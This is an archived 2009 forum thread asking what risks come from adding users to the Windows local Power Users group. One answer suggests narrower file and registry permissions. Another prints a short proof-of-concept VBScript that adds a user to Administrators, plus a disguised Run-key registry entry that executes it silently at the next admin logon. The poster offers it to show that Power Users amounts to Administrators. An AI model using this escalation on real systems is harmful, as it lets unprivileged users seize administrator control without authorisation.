1. Welcome Guest! In order to create a new topic or reply to an existing one, you must register first. It is easy and free. Click here to sign up now!.
    Dismiss Notice

local Power Users group

Discussion in 'Windows Security' started by Michael Perra, Aug 17, 2009.

  1. Michael Perra

    Michael Perra Guest

    We are having some difficulties with some applications. It seams adding
    users to the local Power Users group resolves these issues. I have found
    conflicting information with respect to this. Is there documentation
    outlining the real risks of adding users to the power users group?
     
    Michael Perra, Aug 17, 2009
    #1
  3. Shenan Stanley

    Shenan Stanley Guest

    Michael Perra wrote:<!--coloro:blue--><span style="color:blue <!--/coloro-->
    > We are having some difficulties with some applications. It seams
    > adding users to the local Power Users group resolves these issues.
    > I have found conflicting information with respect to this. Is
    > there documentation outlining the real risks of adding users to the
    > power users group?<!--colorc--><!--/colorc-->

    Change the permissions (File/Folder) for the applications and check what
    specific registry keys it needs access to and make sure your users have
    rights to those.

    Power users can install most things - that's more than enough danger. ;-)

    --
    Shenan Stanley
    MS-MVP
    --
    How To Ask Questions The Smart Way
     
    Shenan Stanley, Aug 17, 2009
    #2
  4. Arley Barros Leal

    Arley Barros Leal Guest

    Can't remenber of any references, but what I do remember is that Power Users
    has lots of admin priviligies, one of them, adding jobs the start up list.
    Some time ago I had actually written a poc vbscript to to add my user to the
    administrators group:

    elevate.vbs
    -----------
    strComputer = "MyComputer"
    Set objGroup = GetObject("WinNT://" & strComputer & "/Administrators,group")
    Set objUser = GetObject("WinNT://" & strComputer & " ormaluser,user")
    objGroup.Add(objUser.ADsPath)

    Then add this entry to the registry:
    ----------------------------------
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "SCTPostUninstall1"="CSCRIPT.EXE C:\\elevate.vbs //B"

    Wait till the next admin logs and then have fun & profit.

    So basically, Power Users = Administrators.

    Hope this helps!

    Cheers,
    Arley Barros Leal
    mcse+security, ITIL, ccsp, inet+, security+, ciwa, ocp, ccna


    "Michael Perra" <Michael Perra@discussions.microsoft.com> wrote in message
    news:E38AE13E-1CD9-4C5C-AE54-C8FDDF4D5B67@microsoft.com...<!--coloro:blue--><span style="color:blue <!--/coloro-->
    > We are having some difficulties with some applications. It seams adding
    > users to the local Power Users group resolves these issues. I have found
    > conflicting information with respect to this. Is there documentation
    > outlining the real risks of adding users to the power users group?
    >
    > <!--colorc--><!--/colorc-->
     
    Arley Barros Leal, Aug 20, 2009
    #3

Share This Page